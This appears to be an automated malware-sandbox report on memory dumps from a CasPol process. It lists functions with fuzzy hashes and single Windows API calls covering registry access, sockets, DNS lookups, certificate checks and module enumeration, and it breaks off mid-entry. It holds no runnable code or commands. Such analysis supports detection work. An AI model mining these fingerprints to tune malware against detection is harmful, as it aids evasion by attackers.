Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7d6050e531956f2398fbe4e900023aba57ef22453a085beb6dd029e01d0bf1d0
Instruction ID: 8e4effa0d2832a851556b81d8bda3c5f5a8f30111733c8fa5c90d36ae0352164
Opcode Fuzzy Hash: 7d6050e531956f2398fbe4e900023aba57ef22453a085beb6dd029e01d0bf1d0
Instruction Fuzzy Hash: 24C19130B002158FCB04DBB8C498AAEBBF2EF89304B158569D416EB355EF75ED41CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 20105020 Relevance: 1.6, APIs: 1, Instructions: 140libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 20105150

Memory Dump Source

Source File: 00000011.00000002.785516606.0000000020100000.00000040.00000800.00020000.00000000.sdmp, Offset: 20100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_20100000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5f84687de7af8cf4dd6ab17e92af289ae158f45ad9fe20052b399224a967a21a
Instruction ID: c830cf484dafaaaa035a2db432320ccf2c9ac912a41064ce944c29841651d49f
Opcode Fuzzy Hash: 5f84687de7af8cf4dd6ab17e92af289ae158f45ad9fe20052b399224a967a21a
Instruction Fuzzy Hash: 5951D430A05384CFD706DBB4C499B9A7FB2AF46304F1580AAE544DF392CB359D45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00EF239C Relevance: 1.6, APIs: 1, Instructions: 111COMMON

Download Yara Rule

APIs

GetTempFileNameW.KERNEL32(?,00000EA4,?,?), ref: 00EF2476

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: FileNameTemp
String ID:
API String ID: 745986568-0
Opcode ID: 93c033c592a8e782182bb62c8a53135353e9efcd4f370954eacaf5a62965cc19
Instruction ID: 3ee0ee1f097ce050bbe0c7c256ae585960b2806733978a2939167e4d498abb9b
Opcode Fuzzy Hash: 93c033c592a8e782182bb62c8a53135353e9efcd4f370954eacaf5a62965cc19
Instruction Fuzzy Hash: 04418B6140E3C06FD7138B258C61A61BFB4AF47614F0E81DBE9C49F5A3D268690AC7B2

Uniqueness

Uniqueness Score: -1.00%

Function 00EF1E8E Relevance: 1.6, APIs: 1, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000EA4), ref: 00EF1F45

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 31d840fab84605f4e93689e3a134b1797e5f41385ee06e3248aebb58ade6b5a1
Instruction ID: bf1dddd7825fe535f9aae1d9b6d32d32707f09efe5efde400903915fb3580e8b
Opcode Fuzzy Hash: 31d840fab84605f4e93689e3a134b1797e5f41385ee06e3248aebb58ade6b5a1
Instruction Fuzzy Hash: 663183B2504344AFE7228F65DC44FA7BFACEF45710F0488AAF9859B152D374A909CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00EF27D3 Relevance: 1.6, APIs: 1, Instructions: 101COMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(?,00000EA4), ref: 00EF28AB

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: getaddrinfo
String ID:
API String ID: 300660673-0
Opcode ID: 350f69d3b931efd1168497d6d978ed93e61fd398672f3331941accdeb84c1217
Instruction ID: fc06d4bf51952dc737fe940542bd1511e9444737880805db7929ac57308fb496
Opcode Fuzzy Hash: 350f69d3b931efd1168497d6d978ed93e61fd398672f3331941accdeb84c1217
Instruction Fuzzy Hash: B131F671405344AFE7229F64DC84FA6BFACEF05310F14849AFA859F192D374A909CB71

Uniqueness

Uniqueness Score: -1.00%

Function 00EF07F8 Relevance: 1.6, APIs: 1, Instructions: 98fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,?,?,?,?,?,?), ref: 00EF08A9

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: ae6aacbaf19c9f68a7af165c40aeb4d8323f5e12e0514d237fd92755b96b13ae
Instruction ID: 24404b66eaa5025a9c870297460f86afc6dda6f5b177b3b72eea7d3c0201c3ef
Opcode Fuzzy Hash: ae6aacbaf19c9f68a7af165c40aeb4d8323f5e12e0514d237fd92755b96b13ae
Instruction Fuzzy Hash: 33316D71505384AFE722CF25DC44B62BFE8EF06714F0884AEE9859B252D365E809CB71

Uniqueness

Uniqueness Score: -1.00%

Function 00EF1770 Relevance: 1.6, APIs: 1, Instructions: 98COMMON

Download Yara Rule

APIs

shutdown.WS2_32(?,00000EA4,AA0DAAB3,00000000,00000000,00000000,00000000), ref: 00EF1804

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: shutdown
String ID:
API String ID: 2510479042-0
Opcode ID: 9cb3fcee66ef50e670db83635f7c7a985684991e50ad2dd9c9aa2ef9cfb8e299
Instruction ID: 7c796561ad4abfe0e3e2d77aca6225641605a85818c444b7b8b91e415ab88e34
Opcode Fuzzy Hash: 9cb3fcee66ef50e670db83635f7c7a985684991e50ad2dd9c9aa2ef9cfb8e299
Instruction Fuzzy Hash: 3E31B4B14097C49FE7128B24AC49B65BFA8EF03724F0985EBE9849F1A3E3645805C772

Uniqueness

Uniqueness Score: -1.00%

Function 00EF1B0B Relevance: 1.6, APIs: 1, Instructions: 93encryptionCOMMON

Download Yara Rule

APIs

CertGetCertificateChain.CRYPT32(?,00000EA4,?,?), ref: 00EF1BCE

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: CertCertificateChain
String ID:
API String ID: 3019455780-0
Opcode ID: a1865dc1166b39bef9b71fd8732bfab7fd7e243fab70753a43db1d79d258344a
Instruction ID: ed03c7462bfa93b7f7ea2eb8a9e26bbfcc7dfd79d9219a9802a6e72e1ef3227a
Opcode Fuzzy Hash: a1865dc1166b39bef9b71fd8732bfab7fd7e243fab70753a43db1d79d258344a
Instruction Fuzzy Hash: 01316F7550D3C45FD7438B259C61A62BFB4EF47614F0D84DBD8848F1A3D2246919C7B2

Uniqueness

Uniqueness Score: -1.00%

Function 00EF208E Relevance: 1.6, APIs: 1, Instructions: 92registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000EA4), ref: 00EF213A

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 3d27fd028be446e9eb75bf1e9eb39cfeaaa7a17a10f5c7791c5a66c636450d69
Instruction ID: 78557d4bcf213eb09402e95c23b7d7adfc68db39f0840d47a16ac8f0004e22f0
Opcode Fuzzy Hash: 3d27fd028be446e9eb75bf1e9eb39cfeaaa7a17a10f5c7791c5a66c636450d69
Instruction Fuzzy Hash: 1831A4B25053846FE7228B25DC44F66BFB8EF46710F08849AFE849B193D274A909C771

Uniqueness

Uniqueness Score: -1.00%

Function 00EF1A0D Relevance: 1.6, APIs: 1, Instructions: 92networkCOMMON

Download Yara Rule

APIs

WSAIoctl.WS2_32(?,00000EA4,AA0DAAB3,00000000,00000000,00000000,00000000), ref: 00EF1AC1

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: Ioctl
String ID:
API String ID: 3041054344-0
Opcode ID: 5cc8c9ad3d79dd9c846c5b9220cbb820e7e7827e5e8ba9239ce635b514071e00
Instruction ID: 56493bc4bca860d6a30d196273cdaeaa0c78f3be48515ad53153697cd08e4c08
Opcode Fuzzy Hash: 5cc8c9ad3d79dd9c846c5b9220cbb820e7e7827e5e8ba9239ce635b514071e00
Instruction Fuzzy Hash: 7C31B271005784AFE722CF25DC40F62BFF8EF06714F08849AE9859B162D334A909CB71

Uniqueness

Uniqueness Score: -1.00%

Function 00EF417F Relevance: 1.6, APIs: 1, Instructions: 91registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000EA4,AA0DAAB3,00000000,00000000,00000000,00000000), ref: 00EF4234

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 49cd78f6f655b645beacb17062ee18cfc8c0229b8a588b99e67e9368308698a0
Instruction ID: 035f5380b611b6401d3296fdc2f9186f83a9235ac18cc6207d8637e5bcb87024
Opcode Fuzzy Hash: 49cd78f6f655b645beacb17062ee18cfc8c0229b8a588b99e67e9368308698a0
Instruction Fuzzy Hash: 843188715053845FE712CB64DC44FA3BFB8EF46710F0885AAE9859F1A2D374A948C771

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AA519 Relevance: 1.6, APIs: 1, Instructions: 90registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000EA4), ref: 1D2AA5C9

Memory Dump Source

Source File: 00000011.00000002.774930640.000000001D2AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d2aa000_CasPol.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: ecad5f7bcdb75ca4f0a4eb1abe46850f7192e0730fa0d3cd90b7b149dcec7689
Instruction ID: 262a71244adbcf77ee1e8a01e7def1c7c971a5257e9807e030ca961b08f078f0
Opcode Fuzzy Hash: ecad5f7bcdb75ca4f0a4eb1abe46850f7192e0730fa0d3cd90b7b149dcec7689
Instruction Fuzzy Hash: C831D1724093806FE7128B24CC84F67BFBCEF06710F08859AF985DB152D264A948CB72

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AA611 Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000EA4,AA0DAAB3,00000000,00000000,00000000,00000000), ref: 1D2AA6CC

Memory Dump Source

Source File: 00000011.00000002.774930640.000000001D2AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d2aa000_CasPol.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 102136ea286fa08016cbf7ab2d27022b478bc4f993b8067c4dcb7ced3a44eabc
Instruction ID: 797109ae644446aa2870191b2d194865f768b5cf4aff7945b15b2de2bda58660
Opcode Fuzzy Hash: 102136ea286fa08016cbf7ab2d27022b478bc4f993b8067c4dcb7ced3a44eabc
Instruction Fuzzy Hash: EB31B3711057815FE722CB25CC85F63BFF8EF06710F18849AE985CB152D264E949CB71

Uniqueness

Uniqueness Score: -1.00%

Function 00EF102E Relevance: 1.6, APIs: 1, Instructions: 87registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000EA4,AA0DAAB3,00000000,00000000,00000000,00000000), ref: 00EF10D8

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: bfe64125f584c0e13da0a3d34a504d43ebe2a56c541e23c45796ec8b1624db30
Instruction ID: 07f6c7c018642da067131bbd5529fc2cb73aa58a7c5341ab4083a72360202d7d
Opcode Fuzzy Hash: bfe64125f584c0e13da0a3d34a504d43ebe2a56c541e23c45796ec8b1624db30
Instruction Fuzzy Hash: A83195725093846FD722CB25DC40FA2BFF8EF46714F0884DAE985DB193D264A949C771

Uniqueness

Uniqueness Score: -1.00%

Function 00EF13C4 Relevance: 1.6, APIs: 1, Instructions: 87fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNEL32 ref: 00EF1476

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: 05a147b5c01898590e564058d778e5ccc4fc6c632de5b28787a610463a78e1da
Instruction ID: f748ec4fb32aed0903d401650d35b1d95301b6e859c04ce6ff738d144ebccc45
Opcode Fuzzy Hash: 05a147b5c01898590e564058d778e5ccc4fc6c632de5b28787a610463a78e1da
Instruction Fuzzy Hash: 6031E4B2405784AFE722CB55DC44F56FFF8EF06320F08859EE9849B252D375A909CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00EF0C27 Relevance: 1.6, APIs: 1, Instructions: 86COMMON

Download Yara Rule

APIs

RasEnumConnectionsW.RASAPI32(?,00000EA4,?,?), ref: 00EF0CDA

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: ConnectionsEnum
String ID:
API String ID: 3832085198-0
Opcode ID: a3f02a8863d1c5120a8b36beb44880b384edaae62405c66ddf9f9d62481ac3e8
Instruction ID: f7282dc305f1389e60e6edb9e0f6b9b208b86fa80822cb8acdf95e19a6cfbec7
Opcode Fuzzy Hash: a3f02a8863d1c5120a8b36beb44880b384edaae62405c66ddf9f9d62481ac3e8
Instruction Fuzzy Hash: DE315E7154E3C05FD7138B258C65A61BFB4EF87610B0A81DFD884CF5A3D229A81ACB72

Uniqueness

Uniqueness Score: -1.00%

Function 00EF1679 Relevance: 1.6, APIs: 1, Instructions: 85synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNEL32(?,?), ref: 00EF1719

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 822b04a3e1d7b6db735ff89edf18266102002d260073547682ffd2b61b69a5ce
Instruction ID: 92bdb08fcbf66fd8f8c961435cd0210181aad8fa4a110c46711889c566b1a97b
Opcode Fuzzy Hash: 822b04a3e1d7b6db735ff89edf18266102002d260073547682ffd2b61b69a5ce
Instruction Fuzzy Hash: 943182B1505384AFE712DF25CD85B66FFE8EF06310F0884AEE985DB292D365A904CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00EF3FB9 Relevance: 1.6, APIs: 1, Instructions: 85registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.KERNEL32(?,00000EA4,?,?), ref: 00EF406A

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: Enum
String ID:
API String ID: 2928410991-0
Opcode ID: 515db2ec918f389c18a822df1dc8ca450db1f353eb0945e55d59250cec4213d5
Instruction ID: 2fbacb00b8c7ba316daf9a4e608ebcb6554db3f20bf8b8897996530d9fba9b6a
Opcode Fuzzy Hash: 515db2ec918f389c18a822df1dc8ca450db1f353eb0945e55d59250cec4213d5
Instruction Fuzzy Hash: 7531616254E3C06FC3138B358C65A61BFB4DF87610B0D80CBD9C58F1A3D225A919D7B2

Uniqueness

Uniqueness Score: -1.00%

Function 00EF0D04 Relevance: 1.6, APIs: 1, Instructions: 85networkCOMMON

Download Yara Rule

APIs

WSASocketW.WS2_32(?,?,?,?,?), ref: 00EF0DB6

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: Socket
String ID:
API String ID: 38366605-0
Opcode ID: d1744446511d679a3102f643a5aee8423464300a3cdea42fbb0ba8e5560c68b5
Instruction ID: 1ec3c2bd7bffa63a843920dff9d60b60b8d4effe977ec8d270addd31bdc30e49
Opcode Fuzzy Hash: d1744446511d679a3102f643a5aee8423464300a3cdea42fbb0ba8e5560c68b5
Instruction Fuzzy Hash: BC31B471105384AFE7228F65DC44B66BFB8EF46314F08849AE9859F163C375A808CB71

Uniqueness

Uniqueness Score: -1.00%

Function 00EF2806 Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(?,00000EA4), ref: 00EF28AB

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: getaddrinfo
String ID:
API String ID: 300660673-0
Opcode ID: 7bac1e190bf1f702508c61b5386b7c6c5c711f6972dd06bdf25c2fcbb7dfd026
Instruction ID: fda8e2aa6af40de2a736f59801c02f27140824655950d9c7067afc3c2553763e
Opcode Fuzzy Hash: 7bac1e190bf1f702508c61b5386b7c6c5c711f6972dd06bdf25c2fcbb7dfd026
Instruction Fuzzy Hash: 6321B271500244AEFB21DF64DC85FB6FBACEF04710F14886EFA89AB181D774A9498B71

Uniqueness

Uniqueness Score: -1.00%

Function 00EF4096 Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000EA4), ref: 00EF412A

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 10a1835a54e23cfccac730fbb5afe1cf8dec3c0b0d35d53cab7afb1499eb4c0c
Instruction ID: 5873b2c0ee91f8fd544a695f83d47b77b1be661df322a9d470e95499b735f9c7
Opcode Fuzzy Hash: 10a1835a54e23cfccac730fbb5afe1cf8dec3c0b0d35d53cab7afb1499eb4c0c
Instruction Fuzzy Hash: 672180B25053446FE7218B25DC45F67BFA8EF45710F0884AAF9849B192D274A948CB71

Uniqueness

Uniqueness Score: -1.00%

Function 00EF1DA0 Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON

Download Yara Rule

APIs

RegOpenCurrentUser.KERNEL32(?,00000EA4), ref: 00EF1E39

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: CurrentOpenUser
String ID:
API String ID: 1571386571-0
Opcode ID: 83c036e0ce43d45493100f3cee8ebe1c43c280e590ec9253b7d6653960c16b83
Instruction ID: 94f338a8f263b3dff4f979caa50b84850e53483cd9667e3f1849907a171caf75
Opcode Fuzzy Hash: 83c036e0ce43d45493100f3cee8ebe1c43c280e590ec9253b7d6653960c16b83
Instruction Fuzzy Hash: 2721B4714093846FE7128B259C45F66BFB8EF46714F0984EBED849F193D264A908CB71

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AADE5 Relevance: 1.6, APIs: 1, Instructions: 82COMMON

Download Yara Rule

APIs

K32GetModuleInformation.KERNEL32(?,00000EA4,AA0DAAB3,00000000,00000000,00000000,00000000), ref: 1D2AAE76

Memory Dump Source

Source File: 00000011.00000002.774930640.000000001D2AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d2aa000_CasPol.jbxd

Similarity

API ID: InformationModule
String ID:
API String ID: 3425974696-0
Opcode ID: fd2fcfd40593ebcaa83fa4c1bed843748eada235861041b146a45ca194209e49
Instruction ID: 9677d796c2069f31ca1fa778fb83e3fc267541aaccf8b09ed027d31f45eaedec
Opcode Fuzzy Hash: fd2fcfd40593ebcaa83fa4c1bed843748eada235861041b146a45ca194209e49
Instruction Fuzzy Hash: CC21B1715453816FE712CF25DC44F67BFA8EF42310F0884AAE995DB152D274E848CB72

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AACFC Relevance: 1.6, APIs: 1, Instructions: 81COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(?,00000EA4,AA0DAAB3,00000000,00000000,00000000,00000000), ref: 1D2AAD86

Memory Dump Source

Source File: 00000011.00000002.774930640.000000001D2AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d2aa000_CasPol.jbxd

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: d6d3c305124efbf24f312817daf1a181af688c7828cbf237f7ce0a80a1c2e3cd
Instruction ID: 2d25b901a6f63d268cbdc1f9dac95be111d0df163c4d33fe500c5795e3e2eede
Opcode Fuzzy Hash: d6d3c305124efbf24f312817daf1a181af688c7828cbf237f7ce0a80a1c2e3cd
Instruction Fuzzy Hash: 4121B2725097816FD7128F25DC44F67BFB8EF46310F1884AAE985DF192C275A848CB72

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AAEDC Relevance: 1.6, APIs: 1, Instructions: 81COMMON

Download Yara Rule

APIs

K32GetModuleBaseNameW.KERNEL32(?,00000EA4,?,?), ref: 1D2AAF82

Memory Dump Source

Source File: 00000011.00000002.774930640.000000001D2AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d2aa000_CasPol.jbxd

Similarity

API ID: BaseModuleName
String ID:
API String ID: 595626670-0
Opcode ID: ae4d2e148244dc839c4c3f0165eea050c3c37a4a40521a7eaca3a4a3cd7b7232
Instruction ID: afb42645b7d666ab4304a8587a76f58de31a57548cad5aabab642a114029a8a2
Opcode Fuzzy Hash: ae4d2e148244dc839c4c3f0165eea050c3c37a4a40521a7eaca3a4a3cd7b7232
Instruction Fuzzy Hash: FD21BF715093C06FD312CB65CC55B66BFB4EF87610F0980DBE8849F2A3D224A909CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 00EF43DF Relevance: 1.6, APIs: 1, Instructions: 79COMMON

Download Yara Rule

APIs

getsockname.WS2_32(?,00000EA4,AA0DAAB3,00000000,00000000,00000000,00000000), ref: 00EF446F

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: getsockname
String ID:
API String ID: 3358416759-0
Opcode ID: c3ab15599a686624c323db8869d9d8e155d0b922fb93da1e57811aad82f9d80d
Instruction ID: 5b563666e801145650a3f2d5b4e5c135aac025b3192d70af56633591cf8f3605
Opcode Fuzzy Hash: c3ab15599a686624c323db8869d9d8e155d0b922fb93da1e57811aad82f9d80d
Instruction Fuzzy Hash: FA217F715093846FE712CF25DC44FA6BFB8EF46710F0884AAEA859F192D264A948CB71

Uniqueness

Uniqueness Score: -1.00%

Function 00EF0D21 Relevance: 1.6, APIs: 1, Instructions: 79networkCOMMON

Download Yara Rule

APIs

WSASocketW.WS2_32(?,?,?,?,?), ref: 00EF0DB6

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: Socket
String ID:
API String ID: 38366605-0
Opcode ID: 1ad3f4d9d4009bc1ef6d60abd52c2d091e7fd336561cde0c8cdd76efc78b63e1
Instruction ID: 47a57a48c8dd4315c4217e8aae7061e60513a76123204b965510fd08f3882c5b
Opcode Fuzzy Hash: 1ad3f4d9d4009bc1ef6d60abd52c2d091e7fd336561cde0c8cdd76efc78b63e1
Instruction Fuzzy Hash: 8921B171505384AFE7228F65DC44F66FFB8EF05310F08849EE9859B192C375A408CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00EF12E2 Relevance: 1.6, APIs: 1, Instructions: 78COMMON

Download Yara Rule

APIs

OpenFileMappingW.KERNELBASE(?,?), ref: 00EF136D

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: FileMappingOpen
String ID:
API String ID: 1680863896-0
Opcode ID: f61bae9ab8c8184646bc3538ca0fb4cbcda29a3890a13a58eca8cf8253d096af
Instruction ID: 598533c0a432749350a9c0d821e2ed0c77eb464b336d6f5fb9dc239842540c57
Opcode Fuzzy Hash: f61bae9ab8c8184646bc3538ca0fb4cbcda29a3890a13a58eca8cf8253d096af
Instruction Fuzzy Hash: F621B1B1505384AFE721CB25CC44F66FFA8EF45310F0884AEE9849B292D375A808CB72

Uniqueness

Uniqueness Score: -1.00%

Function 00EF1EC6 Relevance: 1.6, APIs: 1, Instructions: 78registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000EA4), ref: 00EF1F45

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 5edae0344b9f7397cb25392bd5e5a4dd733c3a37f690cc5e5c8600faf6355214
Instruction ID: 896bf337dd86b3623b059e54be34570419ad992c84170fe8a9407f18dfae15e4
Opcode Fuzzy Hash: 5edae0344b9f7397cb25392bd5e5a4dd733c3a37f690cc5e5c8600faf6355214
Instruction Fuzzy Hash: 06217172600208AEE7219F65DD45FABBBACEF44720F14846AFA85EB241D774E5088A71

Uniqueness

Uniqueness Score: -1.00%

Function 00EF1FB3 Relevance: 1.6, APIs: 1, Instructions: 78registryCOMMON

Download Yara Rule

APIs

RegNotifyChangeKeyValue.KERNEL32(?,00000EA4,AA0DAAB3,00000000,00000000,00000000,00000000), ref: 00EF2044

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: ChangeNotifyValue
String ID:
API String ID: 3933585183-0
Opcode ID: b142ca3322319042a41bc32c05d8e8c6329f8e9ade1f859bcb35bb21af2f15c0
Instruction ID: 414e102d146db8867cbe0550026594c3c25d3ce00ab08dc754391fb1298744bf
Opcode Fuzzy Hash: b142ca3322319042a41bc32c05d8e8c6329f8e9ade1f859bcb35bb21af2f15c0
Instruction Fuzzy Hash: BA21BF72009384AFD7228F24DC44FA7BFACEF45310F0884AEE9859B152D274A508CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 00EF3763 Relevance: 1.6, APIs: 1, Instructions: 78encryptionCOMMON

Download Yara Rule

APIs

CertVerifyCertificateChainPolicy.CRYPT32(?,00000EA4,AA0DAAB3,00000000,00000000,00000000,00000000), ref: 00EF37EA

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: CertCertificateChainPolicyVerify
String ID:
API String ID: 3930008701-0
Opcode ID: a89aaaf0d58953e403b7baea39df83f6be95ea2e73f24a6555aedb979c155c94
Instruction ID: c953628e8682f320e9c1608cb2f0040de4c838b66af3d0c8b3ceeed3f8a96d0a
